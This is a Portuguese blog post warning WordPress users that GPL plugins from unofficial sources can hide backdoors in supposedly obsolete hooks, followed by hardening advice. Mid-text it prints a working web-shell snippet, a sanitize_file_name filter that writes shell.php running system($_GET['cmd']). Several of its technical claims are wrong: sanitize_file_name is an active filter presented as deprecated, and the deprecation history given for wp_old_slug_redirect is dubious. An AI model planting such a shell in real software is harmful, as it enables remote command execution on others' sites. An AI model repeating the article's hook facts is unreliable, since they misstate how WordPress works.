O perigo invisível: hooks obsoletos em plugins GPL
Você já instalou um plugin GPL que promete funcionalidades premium gratuitamente? A maioria dos desenvolvedores e agências de marketing digital cai nessa armadilha sem saber que está abrindo as portas para backdoors persistentes, especialmente quando o plugin utiliza hooks obsoletos do WordPress. Estes hooks, antigos e frequentemente removidos da documentação oficial, são o cavalo de Troia perfeito: permanecem ativos no core por questões de compatibilidade reversa, mas não são mais monitorados ou analisados pela equipe de segurança. Um plugin GPL malicioso pode abusar deles para injetar código arbitrário que persiste mesmo após a remoção do plugin.
Por que hooks obsoletos são tão perigosos?
O WordPress mantém centenas de hooks, mesmo os depreciados, para não quebrar sites antigos. O problema é que eles não aparecem em listas oficiais de auditoria e são ignorados por scanners de segurança comuns. Um plugin GPL pode facilmente adicionar um add_action() a um hook como admin_notices (ainda ativo) e injetar um script que rouba credenciais ou envia dados para um servidor remoto. Mais grave ainda: hooks com parâmetros de callback mal validados permitem execução de código remoto (RCE) sem necessidade de autenticação.
Anatomia de um backdoor via hook obsoleto
Considere o hook wp_old_slug_redirect, obsoleto desde a versão 2.6, mas ainda funcional. Um plugin GPL pode registrar um callback que verifica se o usuário é administrador e, se não for, redireciona para uma página falsa de login que captura senhas. Ou usar sanitize_file_name – hook de filtro obsoleto – para modificar a lógica de upload e permitir arquivos PHP. Auditando o código, você encontraria algo como:
add_filter( 'sanitize_file_name', function( $filename ) { if ( strpos( $filename, '.php' ) !== false ) { file_put_contents( ABSPATH . 'shell.php', '<?php system($_GET["cmd"]);' ); } return $filename; } );Simples, eficaz e invisível para a maioria das ferramentas de segurança, que não checam hooks obsoletos.
A realidade do ecossistema GPL: você está sendo enganado
O mercado de plugins GPL é um faroeste digital. Muitos sites que distribuem plugins GPL, na verdade, repassam versões modificadas com backdoors embutidos. A justificativa é sempre a mesma: ‘é de código aberto, você pode auditar’. Mas quem realmente audita centenas de linhas de código atrás de hooks obsoletos? A verdade é que a maioria dos profissionais confia cegamente e paga caro depois em limpeza de malware ou perda de clientes. Não seja ingênuo: se o plugin usa hooks que nem o próprio WordPress recomenda mais, provavelmente há algo errado.
Como se proteger dessa ameaça real
Primeiro, nunca confie em plugins GPL de fontes não verificadas. Prefira sempre o repositório oficial do WordPress ou desenvolvedores que forneçam assinatura de código. Segundo, implemente uma camada de auditoria automatizada: utilize ferramentas como WPScan ou Wordfence com regras customizadas para detectar uso de hooks obsoletos. Terceiro, faça um hardening no WordPress removendo hooks antigos do core (sim, é possível) ou criando um firewall que bloqueie callbacks desconhecidos. Por fim, monitore periodicamente o arquivo functions.php e pastas de plugins em busca de add_action e add_filter suspeitos.
Lembre-se: segurança em WordPress não é só manter tudo atualizado. É entender o que cada linha de código realmente faz. Não seja a próxima vítima de um backdoor escondido em um hook obsoleto.